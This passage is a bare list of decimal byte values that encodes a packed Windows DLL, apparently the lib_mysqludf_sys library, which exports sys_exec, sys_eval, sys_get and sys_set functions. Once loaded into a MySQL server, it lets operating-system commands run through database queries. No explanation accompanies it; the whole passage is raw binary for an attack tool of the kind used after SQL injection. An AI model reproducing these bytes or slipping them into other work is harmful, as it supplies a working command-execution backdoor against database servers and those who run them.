189, 210, 15, 133, 3, 238, 70, 187, 116, 8, 7, 94, 228, 40, 7, 60, 15, 142, 13, 141, 230, 182, 27, 110, 43, 197, 142, 211, 16, 95, 220, 253, 62, 118, 251, 15, 177, 45, 96, 46, 10, 116, 30, 242, 144, 185, 232, 3, 201, 29, 25, 191, 219, 54, 147, 29, 66, 117, 232, 65, 50, 7, 131, 248, 2, 116, 15, 185, 239, 109, 195, 179, 31, 183, 14, 202, 2, 8, 226, 237, 13, 47, 46, 51, 142, 116, 15, 210, 17, 25, 18, 248, 116, 73, 20, 18, 252, 24, 218, 220, 11, 31, 217, 88, 248, 71, 223, 114, 22, 95, 24, 3, 182, 187, 45, 112, 30, 74, 208, 201, 235, 8, 21, 115, 237, 18, 236, 246, 190, 219, 207, 39, 116, 25, 45, 6, 66, 155, 215, 45, 6, 152, 251, 251, 102, 216, 51, 219, 137, 29, 184, 14, 135, 29, 185, 6, 113, 111, 199, 254, 181, 152, 6, 229, 65, 59, 213, 221, 226, 101, 65, 4, 37, 48, 187, 125, 187, 189, 0, 44, 9, 120, 8, 30, 139, 243, 240, 72, 185, 61, 136, 48, 114, 176, 183, 146, 10, 99, 199, 116, 26, 214, 70, 24, 215, 210, 155, 47, 28, 107, 117, 227, 235, 3, 123, 245, 167, 154, 94, 214, 57, 12, 149, 12, 218, 235, 63, 234, 31, 159, 125, 183, 240, 142, 143, 8, 6, 68, 137, 45, 49, 45, 27, 196, 133, 192, 103, 143, 237, 98, 119, 26, 21, 229, 222, 13, 214, 24, 26, 190, 127, 221, 187, 238, 199, 5, 7, 37, 2, 69, 133, 246, 117, 7, 180, 4, 187, 131, 61, 20, 221, 201, 110, 115, 6, 139, 33, 42, 11, 45, 92, 111, 17, 222, 221, 38, 79, 227, 2, 156, 241, 44, 102, 1, 45, 58, 39, 62, 158, 158, 190, 16, 197, 143, 56, 210, 64, 228, 104, 236, 152, 113, 122, 96, 220, 233, 23, 72, 195, 177, 77, 34, 25, 15, 108, 32, 72, 58, 90, 219, 243, 8, 80, 88, 81, 240, 221, 5, 187, 238, 119, 223, 61, 4, 31, 32, 137, 21, 209, 38, 149, 210, 117, 19, 57, 21, 215, 9, 237, 127, 56, 195, 117, 11, 90, 23, 198, 30, 131, 250, 1, 116, 5, 4, 10, 221, 107, 224, 2, 117, 51, 137, 49, 211, 157, 8, 163, 183, 27, 13, 52, 200, 78, 32, 197, 116, 19, 74, 198, 139, 7, 134, 61, 185, 215, 166, 75, 252, 22, 22, 224, 201, 1, 107, 60, 26, 14, 220, 131, 255, 176, 146, 235, 218, 21, 53, 171, 49, 27, 193, 27, 219, 91, 11, 216, 12, 67, 12, 29, 200, 23, 8, 77, 123, 247, 135, 117, 92, 11, 24, 65, 255, 211, 133, 255, 136, 255, 3, 117, 57, 112, 247, 157, 117, 9, 74, 8, 174, 235, 141, 28, 165, 30, 54, 236, 100, 139, 23, 16, 40, 173, 235, 6, 216, 25, 46, 204, 41, 138, 220, 37, 243, 0, 139, 195, 101, 158, 135, 147, 112, 139, 33, 139, 139, 248, 181, 157, 158, 42, 64, 85, 191, 21, 234, 163, 137, 77, 122, 250, 182, 27, 1, 1, 139, 8, 7, 36, 176, 214, 125, 93, 144, 45, 217, 194, 48, 47, 94, 125, 10, 177, 72, 88, 37, 255, 77, 219, 150, 12, 30, 146, 56, 125, 46, 218, 2, 241, 1, 215, 19, 111, 163, 248, 117, 5, 108, 12, 252, 250, 125, 145, 136, 68, 164, 253, 37, 139, 3, 105, 131, 235, 47, 158, 142, 9, 12, 239, 198, 248, 82, 161, 137, 158, 38, 129, 236, 136, 0, 104, 205, 118, 13, 191, 254, 115, 21, 63, 21, 103, 5, 184, 198, 72, 242, 88, 69, 183, 57, 12, 184, 40, 61, 31, 44, 88, 97, 112, 195, 57, 222, 246, 22, 36, 235, 117, 65, 72, 183, 61, 198, 54, 66, 56, 0, 64, 68, 35, 4, 48, 9, 14, 102, 47, 207, 64, 40, 5, 120, 37, 71, 3, 5, 92, 115, 135, 76, 28, 81, 73, 78, 125, 75, 177, 7, 127, 75, 240, 235, 34, 43, 128, 147, 68, 123, 221, 131, 125, 115, 141, 14, 131, 192, 8, 18, 209, 62, 141, 103, 219, 123, 100, 42, 5, 155, 36, 13, 32, 144, 47, 156, 91, 162, 91, 112, 28, 42, 114, 20, 9, 123, 192, 9, 204, 62, 30, 102, 108, 146, 103, 36, 118, 110, 131, 53, 114, 219, 255, 11, 112, 220, 122, 20, 47, 72, 44, 56, 176, 187, 36, 147, 130, 123, 142, 240, 131, 210, 57, 106, 20, 1, 155, 21, 101, 12, 203, 54, 220, 146, 85, 182, 36, 200, 10, 39, 27, 131, 215, 108, 24, 84, 186, 106, 35, 78, 51, 107, 23, 132, 247, 129, 196, 172, 160, 65, 89, 41, 71, 166, 38, 35, 28, 15, 216, 207, 83, 24, 129, 134, 217, 239, 13, 104, 41, 90, 74, 20, 138, 142, 248, 236, 236, 205, 214, 68, 39, 203, 19, 102, 235, 117, 185, 8, 103, 75, 50, 210, 29, 234, 144, 45, 58, 28, 17, 40, 16, 100, 100, 32, 10, 139, 131, 175, 51, 68, 99, 151, 27, 203, 54, 228, 24, 195, 35, 219, 131, 162, 56, 36, 61, 5, 246, 40, 9, 153, 57, 89, 182, 17, 64, 43, 220, 103, 140, 144, 193, 54, 222, 27, 195, 1, 127, 55, 50, 2, 150, 36, 127, 21, 244, 246, 18, 13, 98, 118, 216, 27, 192, 3, 131, 232, 1, 60, 32, 117, 100, 63, 40, 156, 141, 61, 83, 4, 26, 120, 127, 75, 141, 29, 76, 6, 141, 19, 160, 132, 145, 121, 14, 195, 114, 179, 50, 97, 41, 169, 239, 79, 19, 127, 35, 68, 114, 12, 201, 102, 129, 57, 77, 90, 117, 252, 183, 195, 255, 23, 72, 99, 81, 60, 129, 60, 10, 80, 69, 225, 19, 124, 10, 24, 11, 2, 15, 148, 192, 99, 227, 67, 2, 159, 76, 99, 65, 60, 254, 201, 180, 235, 237, 141, 126, 210, 76, 3, 193, 65, 60, 64, 20, 69, 4, 88, 6, 69, 37, 255, 194, 95, 106, 74, 177, 0, 24, 116, 31, 139, 81, 11, 59, 210, 114, 10, 139, 65, 8, 237, 111, 248, 219, 3, 194, 9, 208, 114, 16, 65, 131, 193, 19, 193, 40, 69, 59, 203, 114, 225, 111, 199, 150, 176, 93, 28, 193, 195, 207, 76, 193, 38, 122, 247, 68, 105, 146, 225, 218, 133, 220, 189, 31, 76, 43, 193, 95, 234, 251, 90, 190, 208, 20, 12, 205, 15, 58, 36, 193, 232, 31, 96, 13, 44, 254, 247, 208, 131, 224, 1, 235, 2, 88, 79, 214, 68, 171, 54, 1, 150, 235, 202, 192, 182, 108, 48, 8, 238, 193, 139, 1, 167, 255, 170, 18, 141, 60, 199, 118, 39, 37, 34, 5, 204, 17, 206, 120, 220, 166, 6, 203, 17, 63, 117, 70, 61, 167, 15, 240, 221, 70, 3, 36, 27, 71, 30, 184, 1, 0, 0, 0, 39, 124, 41, 132, 127, 63, 229, 32, 0, 0, 129, 191, 248, 60, 61, 252, 50, 162, 223, 45, 153, 43, 125, 199, 248, 48, 116, 20, 157, 111, 163, 208, 14, 127, 93, 198, 38, 139, 45, 194, 133, 88, 107, 33, 36, 48, 188, 98, 134, 182, 72, 153, 52, 225, 10, 185, 180, 200, 86, 224, 70, 113, 216, 73, 70, 11, 181, 14, 115, 28, 14, 177, 16, 217, 190, 16, 168, 216, 19, 254, 106, 76, 184, 76, 51, 219, 206, 184, 255, 0, 133, 96, 55, 186, 22, 35, 233, 184, 51, 137, 117, 221, 224, 22, 177, 223, 116, 77, 68, 216, 156, 29, 57, 183, 5, 219, 221, 132, 73, 247, 211, 9, 55, 32, 210, 251, 220, 75, 70, 70, 70, 54, 5, 222, 224, 226, 228, 178, 71, 70, 70, 94, 80, 90, 17, 0, 0, 85, 201, 168, 170, 41, 128, 100, 84, 127, 176, 23, 216, 6, 144, 23, 48, 48, 7, 208, 78, 111, 32, 97, 114, 255, 255, 223, 254, 103, 117, 109, 101, 110, 116, 115, 9, 108, 108, 111, 119, 101, 100, 32, 40, 117, 100, 102, 58, 32, 108, 105, 98, 95, 109, 121, 115, 11, 246, 183, 221, 113, 108, 13, 95, 115, 8, 95, 105, 110, 102, 111, 41, 65, 28, 128, 237, 255, 35, 32, 118, 101, 114, 115, 105, 111, 110, 32, 48, 46, 1, 52, 237, 237, 238, 23, 161, 120, 112, 101, 99, 116, 75, 101, 120, 97, 7, 108, 121, 32, 26, 109, 187, 125, 251, 101, 32, 115, 116, 114, 67, 103, 32, 116, 121, 27, 32, 112, 118, 97, 117, 216, 41, 155, 109, 33, 114, 79, 47, 116, 119, 153, 109, 96, 1, 11, 31, 67, 142, 246, 246, 3, 251, 114, 32, 110, 97, 109, 76, 67, 111, 117, 108, 36, 110, 111, 116, 204, 232, 182, 109, 59, 99, 97, 19, 32, 24, 109, 39, 121, 99, 114, 255, 133, 7, 64, 49, 1, 6, 2, 53, 50, 2, 48, 1, 36, 13, 0, 36, 246, 255, 183, 255, 212, 7, 0, 31, 196, 8, 0, 26, 116, 11, 21, 100, 12, 0, 16, 84, 11, 0, 11, 52, 10, 0, 4, 130, 39, 118, 187, 220, 254, 25, 24, 9, 0, 24, 196, 15, 19, 116, 14, 100, 11, 9, 52, 39, 183, 99, 212, 237, 4, 98, 23, 212, 30, 94, 63, 25, 3, 36, 26, 237, 186, 207, 44, 80, 7, 57, 15, 42, 7, 128, 26, 187, 220, 110, 131, 103, 22, 91, 22, 116, 55, 17, 100, 12, 52, 11, 123, 216, 91, 119, 4, 66, 19, 12, 57, 12, 1, 17, 131, 80, 17, 139, 155, 109, 247, 5, 83, 1, 51, 135, 28, 3, 228, 0, 29, 93, 144, 237, 96, 67, 14, 5, 123, 116, 63, 9, 186, 238, 176, 216, 4, 1, 7, 47, 103, 7, 148, 3, 160, 96, 119, 219, 193, 7, 1, 70, 47, 70, 43, 16, 116, 9, 47, 13, 182, 217, 78, 52, 22, 3, 59, 1, 0, 7, 21, 187, 11, 182, 189, 151, 21, 116, 6, 47, 100, 247, 223, 33, 0, 8, 132, 221, 182, 64, 174, 4, 52, 57, 116, 31, 0, 191, 32, 238, 236, 237, 182, 20, 6, 41, 3, 76, 52, 31, 11, 169, 3, 225, 194, 222, 190, 36, 15, 5, 195, 5, 52, 10, 19, 35, 75, 211, 109, 155, 110, 35, 67, 30, 20, 196, 95, 15, 71, 10, 117, 183, 19, 118, 5, 84, 9, 75, 1, 9, 137, 9, 162, 7, 30, 125, 229, 114, 187, 31, 30, 116, 47, 18, 100, 13, 52, 135, 1, 66, 183, 21, 130, 187, 46, 19, 17, 207, 12, 3, 202, 150, 221, 14, 1, 56, 15, 56, 116, 39, 0, 81, 36, 163, 170, 254, 193, 2, 70, 221, 205, 93, 32, 210, 102, 212, 255, 85, 85, 22, 201, 0, 23, 143, 160, 42, 27, 0, 48, 17, 118, 75, 213, 108, 3, 145, 128, 191, 160, 7, 224, 18, 109, 215, 157, 221, 3, 112, 52, 7, 248, 3, 104, 11, 0, 19, 2, 106, 118, 251, 186, 134, 3, 84, 11, 20, 2, 24, 20, 23, 11, 88, 21, 144, 251, 47, 7, 217, 238, 236, 246, 10, 21, 3, 16, 52, 7, 39, 3, 0, 52, 7, 91, 213, 185, 221, 112, 3, 224, 51, 111, 7, 36, 179, 204, 117, 93, 215, 117, 11, 48, 7, 66, 3, 172, 11, 144, 7, 245, 182, 27, 148, 219, 3, 192, 50, 51, 146, 12, 25, 3, 200, 186, 5, 160, 235, 11, 16, 7, 79, 139, 232, 11, 80, 131, 117, 175, 235, 7, 115, 3, 68, 71, 7, 153, 11, 160, 182, 93, 215, 117, 7, 229, 3, 40, 11, 240, 7, 58, 28, 3, 60, 0, 56, 183, 235, 11, 80, 7, 247, 28, 167, 11, 119, 182, 59, 219, 139, 25, 29, 47, 32, 7, 56, 29, 203, 64, 7, 29, 172, 123, 93, 131, 3, 108, 131, 7, 211, 11, 96, 30, 157, 237, 94, 179, 3, 155, 124, 95, 7, 193, 30, 59, 224, 208, 174, 59, 219, 7, 3, 31, 59, 16, 7, 214, 3, 156, 51, 202, 18, 85, 149, 74, 0, 85, 37, 163, 170, 168, 170, 146, 81, 100, 84, 85, 201, 208, 155, 160, 136, 124, 4, 2, 196, 255, 22, 54, 1, 87, 97, 105, 116, 70, 111, 114, 83, 172, 127, 43, 64, 252, 108, 101, 79, 98, 106, 189, 20, 86, 105, 114, 116, 117, 97, 246, 55, 3, 196, 108, 65, 154, 13, 83, 101, 116, 69, 110, 118, 18, 109, 191, 1, 226, 111, 110, 228, 86, 97, 114, 105, 97, 98, 43, 65, 235, 46, 64, 188, 24, 67, 114, 101, 184, 84, 104, 6, 100, 13, 246, 91, 247, 109, 71, 38, 67, 117, 114, 114, 34, 80, 42, 99, 101, 115, 115, 73, 20, 226, 131, 205, 18, 38, 19, 84, 105, 99, 107, 182, 253, 110, 3, 2, 110, 107, 81, 117, 101, 114, 121, 80, 3, 102, 132, 222, 219, 177, 246, 109, 97, 110, 55, 22, 101, 114, 24, 68, 105, 115, 103, 111, 219, 219, 207, 55, 76, 105, 98, 114, 120, 121, 67, 97, 146, 115, 26, 82, 116, 108, 99, 59, 183, 109, 9, 112, 162, 114, 45, 44, 120, 116, 18, 76, 189, 181, 173, 253, 111, 111, 107, 117, 112, 70, 62, 194, 105, 22, 178, 116, 114, 121, 223, 181, 7, 139, 23, 205, 85, 110, 119, 228, 126, 73, 115, 68, 101, 98, 115, 111, 107, 237, 117, 103, 103, 99, 167, 165, 101, 131, 225, 29, 254, 182, 183, 114, 104, 97, 110, 100, 69, 120, 131, 112, 64, 70, 105, 108, 165, 108, 133, 197, 135, 25, 241, 147, 25, 218, 182, 18, 84, 23, 109, 101, 21, 17, 83, 218, 246, 88, 107, 57, 53, 43, 83, 121, 115, 23, 109, 250, 129, 232, 117, 23, 69, 65, 115, 66, 101, 9, 163, 219, 254, 67, 67, 136, 160, 137, 95, 97, 109, 115, 103, 95, 204, 105, 144, 179, 133, 11, 191, 95, 95, 67, 95, 115, 112, 139, 105, 102, 40, 95, 126, 38, 124, 219, 118, 111, 95, 100, 17, 111, 3, 95, 112, 111, 105, 34, 67, 11, 118, 219, 38, 99, 218, 95, 100, 206, 40, 0, 9, 98, 107, 49, 20, 45, 50, 95, 122, 19, 196, 23, 132, 11, 95, 123, 80, 112, 91, 108, 115, 95, 51, 10, 108, 33, 34, 5, 219, 90, 204, 216, 42, 88, 9, 110, 115, 237, 107, 201, 130, 19, 15, 215, 109, 100, 62, 214, 186, 214, 222, 117, 108, 52, 63, 21, 65, 109, 23, 12, 222, 163, 224, 2, 10, 181, 38, 137, 163, 181, 101, 201, 51, 161, 150, 6, 59, 193, 109, 177, 91, 7, 114, 101, 37, 8, 102, 17, 21, 8, 13, 91, 161, 115, 156, 41, 112, 159, 115, 20, 155, 181, 173, 185, 57, 50, 174, 110, 7, 77, 15, 133, 215, 186, 219, 197, 111, 115, 106, 102, 58, 112, 16, 94, 59, 132, 237, 112, 112, 88, 49, 116, 123, 109, 52, 63, 223, 21, 244, 199, 0, 240, 140, 33, 24, 8, 0, 226, 100, 134, 6, 0, 167, 110, 251, 15, 227, 39, 161, 90, 230, 240, 0, 34, 32, 11, 2, 8, 8, 18, 12, 176, 119, 68, 179, 20, 19, 46, 0, 16, 0, 0, 5, 207, 30, 108, 155, 2, 2, 4, 51, 5, 0, 2, 8, 128, 0, 195, 2, 246, 99, 20, 109, 22, 1, 0, 2, 46, 6, 58, 247, 108, 101, 15, 10, 80, 57, 67, 48, 144, 141, 232, 219, 136, 34, 60, 20, 96, 226, 216, 128, 212, 189, 1, 24, 2, 1, 131, 112, 58, 172, 187, 2, 75, 0, 48, 58, 1, 30, 70, 68, 164, 43, 46, 16, 84, 130, 45, 59, 216, 16, 144, 18, 0, 220, 0, 179, 219, 198, 59, 111, 96, 46, 114, 100, 167, 97, 8, 85, 11, 83, 89, 119, 97, 221, 0, 12, 3, 22, 39, 64, 2, 46, 38, 41, 27, 97, 246, 0, 216, 5, 16, 12, 34, 39, 54, 22, 236, 236, 192, 46, 112, 40, 80, 235, 39, 36, 79, 216, 32, 252, 0, 114, 115, 114, 99, 0, 19, 96, 39, 179, 199, 1, 50, 38, 101, 9, 66, 252, 166, 100, 176, 112, 39, 40, 66, 27, 64, 54, 192, 141, 109, 5, 202, 114, 18, 211, 6, 0, 0, 0, 0, 0, 0, 144, 0, 255, 0, 72, 137, 76, 36, 8, 72, 137, 84, 36, 16, 76, 137, 68, 36, 24, 128, 250, 1, 15, 133, 69, 2, 0, 0, 83, 86, 87, 85, 72, 141, 53, 205, 240, 255, 255, 72, 141, 190, 0, 128, 255, 255, 87, 49, 219, 49, 201, 72, 131, 205, 255, 232, 80, 0, 0, 0, 1, 219, 116, 2, 243, 195, 139, 30, 72, 131, 238, 252, 17, 219, 138, 22, 243, 195, 72, 141, 4, 47, 131, 249, 5, 138, 16, 118, 33, 72, 131, 253, 252, 119, 27, 131, 233, 4, 139, 16, 72, 131, 192, 4, 131, 233, 4, 137, 23, 72, 141, 127, 4, 115, 239, 131, 193, 4, 138, 16, 116, 16, 72, 255, 192, 136, 23, 131, 233, 1, 138, 16, 72, 141, 127, 1, 117, 240, 243, 195, 252, 65, 91, 235, 8, 72, 255, 198, 136, 23, 72, 255, 199, 138, 22, 1, 219, 117, 10, 139, 30, 72, 131, 238, 252, 17, 219, 138, 22, 114, 230, 141, 65, 1, 65, 255, 211, 17, 192, 1, 219, 117, 10, 139, 30, 72, 131, 238, 252, 17, 219, 138, 22, 115, 235, 131, 232, 3, 114, 23, 193, 224, 8, 15, 182, 210, 9, 208, 72, 255, 198, 131, 240, 255, 15, 132, 58, 0, 0, 0, 72, 99, 232, 141, 65, 1, 65, 255, 211, 17, 201, 65, 255, 211, 17, 201, 117, 24, 137, 193, 131, 192, 2, 65, 255, 211, 17, 201, 1, 219, 117, 8, 139, 30, 72, 131, 238, 252, 17, 219, 115, 237, 72, 129, 253, 0, 243, 255, 255, 17, 193, 232, 58, 255, 255, 255, 235, 131, 94, 72, 137, 247, 185, 0, 18, 0, 0, 178, 0, 72, 137, 251, 235, 44, 138, 7, 72, 131, 199, 1, 60, 128, 114, 10, 60, 143, 119, 6, 128, 127, 254, 15, 116, 6, 44, 232, 60, 1, 119, 35, 56, 23, 117, 31, 139, 7, 37, 0, 255, 255, 255, 15, 200, 41, 248, 1, 216, 171, 72, 131, 233, 4, 138, 7, 72, 131, 199, 1, 72, 255, 201, 117, 217, 235, 5, 72, 255, 201, 117, 190, 72, 131, 236, 40, 72, 141, 190, 0, 112, 0, 0, 139, 7, 9, 192, 116, 79, 139, 95, 4, 72, 141, 140, 48, 176, 161, 0, 0, 72, 1, 243, 72, 131, 199, 8, 255, 150, 236, 161, 0, 0, 72, 149, 138, 7, 72, 255, 199, 8, 192, 116, 215, 72, 137, 249, 72, 137, 250, 255, 200, 242, 174, 72, 137, 233, 255, 150, 244, 161, 0, 0, 72, 9, 192, 116, 9, 72, 137, 3, 72, 131, 195, 8, 235, 214, 72, 131, 196, 40, 93, 95, 94, 91, 49, 192, 195, 72, 131, 196, 40, 72, 131, 199, 4, 72, 141, 94, 252, 49, 192, 138, 7, 72, 255, 199, 9, 192, 116, 35, 60, 239, 119, 17, 72, 1, 195, 72, 139, 3, 72, 15, 200, 72, 1, 240, 72, 137, 3, 235, 224, 36, 15, 193, 224, 16, 102, 139, 7, 72, 131, 199, 2, 235, 225, 72, 139, 174, 252, 161, 0, 0, 72, 141, 190, 0, 240, 255, 255, 187, 0, 16, 0, 0, 80, 73, 137, 225, 65, 184, 4, 0, 0, 0, 72, 137, 218, 72, 137, 249, 72, 131, 236, 32, 255, 213, 72, 141, 135, 23, 2, 0, 0, 128, 32, 127, 128, 96, 40, 127, 76, 141, 76, 36, 32, 77, 139, 1, 72, 137, 218, 72, 137, 249, 255, 213, 72, 131, 196, 40, 93, 95, 94, 91, 72, 141, 68, 36, 128, 106, 0, 72, 57, 196, 117, 249, 72, 131, 236, 128, 76, 139, 68, 36, 24, 72, 139, 84, 36, 16, 72, 139, 76, 36, 8, 233, 31, 121, 255, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 1, 0, 24, 0, 0, 0, 24, 0, 0, 128, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 1, 0, 2, 0, 0, 0, 48, 0, 0, 128, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 1, 0, 9, 4, 0, 0, 72, 0, 0, 0, 92, 176, 0, 0, 84, 1, 0, 0, 228, 4, 0, 0, 0, 0, 0, 0, 88, 96, 0, 0, 60, 97, 115, 115, 101, 109, 98, 108, 121, 32, 120, 109, 108, 110, 115, 61, 34, 117, 114, 110, 58, 115, 99, 104, 101, 109, 97, 115, 45, 109, 105, 99, 114, 111, 115, 111, 102, 116, 45, 99, 111, 109, 58, 97, 115, 109, 46, 118, 49, 34, 32, 109, 97, 110, 105, 102, 101, 115, 116, 86, 101, 114, 115, 105, 111, 110, 61, 34, 49, 46, 48, 34, 62, 13, 10, 32, 32, 60, 100, 101, 112, 101, 110, 100, 101, 110, 99, 121, 62, 13, 10, 32, 32, 32, 32, 60, 100, 101, 112, 101, 110, 100, 101, 110, 116, 65, 115, 115, 101, 109, 98, 108, 121, 62, 13, 10, 32, 32, 32, 32, 32, 32, 60, 97, 115, 115, 101, 109, 98, 108, 121, 73, 100, 101, 110, 116, 105, 116, 121, 32, 116, 121, 112, 101, 61, 34, 119, 105, 110, 51, 50, 34, 32, 110, 97, 109, 101, 61, 34, 77, 105, 99, 114, 111, 115, 111, 102, 116, 46, 86, 67, 56, 48, 46, 67, 82, 84, 34, 32, 118, 101, 114, 115, 105, 111, 110, 61, 34, 56, 46, 48, 46, 53, 48, 54, 48, 56, 46, 48, 34, 32, 112, 114, 111, 99, 101, 115, 115, 111, 114, 65, 114, 99, 104, 105, 116, 101, 99, 116, 117, 114, 101, 61, 34, 97, 109, 100, 54, 52, 34, 32, 112, 117, 98, 108, 105, 99, 75, 101, 121, 84, 111, 107, 101, 110, 61, 34, 49, 102, 99, 56, 98, 51, 98, 57, 97, 49, 101, 49, 56, 101, 51, 98, 34, 62, 60, 47, 97, 115, 115, 101, 109, 98, 108, 121, 73, 100, 101, 110, 116, 105, 116, 121, 62, 13, 10, 32, 32, 32, 32, 60, 47, 100, 101, 112, 101, 110, 100, 101, 110, 116, 65, 115, 115, 101, 109, 98, 108, 121, 62, 13, 10, 32, 32, 60, 47, 100, 101, 112, 101, 110, 100, 101, 110, 99, 121, 62, 13, 10, 60, 47, 97, 115, 115, 101, 109, 98, 108, 121, 62, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 44, 178, 0, 0, 236, 177, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 57, 178, 0, 0, 28, 178, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 68, 178, 0, 0, 0, 0, 0, 0, 82, 178, 0, 0, 0, 0, 0, 0, 98, 178, 0, 0, 0, 0, 0, 0, 114, 178, 0, 0, 0, 0, 0, 0, 128, 178, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 142, 178, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 75, 69, 82, 78, 69, 76, 51, 50, 46, 68, 76, 76, 0, 77, 83, 86, 67, 82, 56, 48, 46, 100, 108, 108, 0, 0, 76, 111, 97, 100, 76, 105, 98, 114, 97, 114, 121, 65, 0, 0, 71, 101, 116, 80, 114, 111, 99, 65, 100, 100, 114, 101, 115, 115, 0, 0, 86, 105, 114, 116, 117, 97, 108, 80, 114, 111, 116, 101, 99, 116, 0, 0, 86, 105, 114, 116, 117, 97, 108, 65, 108, 108, 111, 99, 0, 0, 86, 105, 114, 116, 117, 97, 108, 70, 114, 101, 101, 0, 0, 0, 102, 114, 101, 101, 0, 0, 0, 0, 0, 0, 0, 0, 167, 39, 161, 90, 0, 0, 0, 0, 116, 179, 0, 0, 1, 0, 0, 0, 18, 0, 0, 0, 18, 0, 0, 0, 192, 178, 0, 0, 8, 179, 0, 0, 80, 179, 0, 0, 112, 16, 0, 0, 96, 16, 0, 0, 0, 16, 0, 0, 128, 21, 0, 0, 96, 16, 0, 0, 112, 21, 0, 0, 32, 20, 0, 0, 96, 16, 0, 0, 144, 19, 0, 0, 0, 20, 0, 0, 96, 16, 0, 0, 144, 19, 0, 0, 48, 17, 0, 0, 96, 16, 0, 0, 192, 16, 0, 0, 0, 19, 0, 0, 224, 18, 0, 0, 160, 17, 0, 0, 137, 179, 0, 0, 159, 179, 0, 0, 188, 179, 0, 0, 215, 179, 0, 0, 227, 179, 0, 0, 246, 179, 0, 0, 7, 180, 0, 0, 16, 180, 0, 0, 32, 180, 0, 0, 46, 180, 0, 0, 55, 180, 0, 0, 71, 180, 0, 0, 85, 180, 0, 0, 93, 180, 0, 0, 108, 180, 0, 0, 121, 180, 0, 0, 129, 180, 0, 0, 144, 180, 0, 0, 0, 0, 1, 0, 2, 0, 3, 0, 4, 0, 5, 0, 6, 0, 7, 0, 8, 0, 9, 0, 10, 0, 11, 0, 12, 0, 13, 0, 14, 0, 15, 0, 16, 0, 17, 0, 108, 105, 98, 95, 109, 121, 115, 113, 108, 117, 100, 102, 95, 115, 121, 115, 46, 100, 108, 108, 0, 108, 105, 98, 95, 109, 121, 115, 113, 108, 117, 100, 102, 95, 115, 121, 115, 95, 105, 110, 102, 111, 0, 108, 105, 98, 95, 109, 121, 115, 113, 108, 117, 100, 102, 95, 115, 121, 115, 95, 105, 110, 102, 111, 95, 100, 101, 105, 110, 105, 116, 0, 108, 105, 98, 95, 109, 121, 115, 113, 108, 117, 100, 102, 95, 115, 121, 115, 95, 105, 110, 102, 111, 95, 105, 110, 105, 116, 0, 115, 121, 115, 95, 98, 105, 110, 101, 118, 97, 108, 0, 115, 121, 115, 95, 98, 105, 110, 101, 118, 97, 108, 95, 100, 101, 105, 110, 105, 116, 0, 115, 121, 115, 95, 98, 105, 110, 101, 118, 97, 108, 95, 105, 110, 105, 116, 0, 115, 121, 115, 95, 101, 118, 97, 108, 0, 115, 121, 115, 95, 101, 118, 97, 108, 95, 100, 101, 105, 110, 105, 116, 0, 115, 121, 115, 95, 101, 118, 97, 108, 95, 105, 110, 105, 116, 0, 115, 121, 115, 95, 101, 120, 101, 99, 0, 115, 121, 115, 95, 101, 120, 101, 99, 95, 100, 101, 105, 110, 105, 116, 0, 115, 121, 115, 95, 101, 120, 101, 99, 95, 105, 110, 105, 116, 0, 115, 121, 115, 95, 103, 101, 116, 0, 115, 121, 115, 95, 103, 101, 116, 95, 100, 101, 105, 110, 105, 116, 0, 115, 121, 115, 95, 103, 101, 116, 95, 105, 110, 105, 116, 0, 115, 121, 115, 95, 115, 101, 116, 0, 115, 121, 115, 95, 115, 101, 116, 95, 100, 101, 105, 110, 105, 116, 0, 115, 121, 115, 95, 115, 101, 116, 95, 105, 110, 105, 116, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 